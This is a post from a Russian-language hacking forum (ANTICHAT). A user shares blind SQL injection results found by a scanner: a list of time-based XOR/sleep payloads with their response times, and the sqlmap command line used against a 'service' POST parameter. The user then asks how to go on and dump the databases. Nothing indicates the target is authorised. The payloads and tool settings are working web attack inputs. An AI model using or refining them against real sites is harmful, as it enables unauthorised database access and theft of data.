HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 21.02.2020, 18:04
NineCent
Новичок
Регистрация: 04.11.2018
Сообщений: 2
С нами: 3961046

Репутация: 0
По умолчанию

Кто сможет помочь, Акунет нашел скулю слепую.
  • 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.333
  • 0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z => 9.471
  • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.449
  • 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.776
  • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.608
  • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.581
  • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.463
  • 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.504
  • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.7
Начинаю крутить Sql map пишу следующее

тут файл с куками и прочим -p "service" --dbs --threads 10 --time-sec 10 --risk=3 --level=5

Он мне пишет что параметр уязвим.

[16:58:49] [INFO] POST parameter 'service' appears to be 'HSQLDB >= 2.0 stacked queries (heavy query)' injectable

it looks like the back-end DBMS is 'HSQLDB'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

Но потом ничего не находит

каждый раз когда запускаю снова, выдает результат но уже другой вариант уязвимой версии =\

Что можно попробовать подскажите пожалуйста.
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.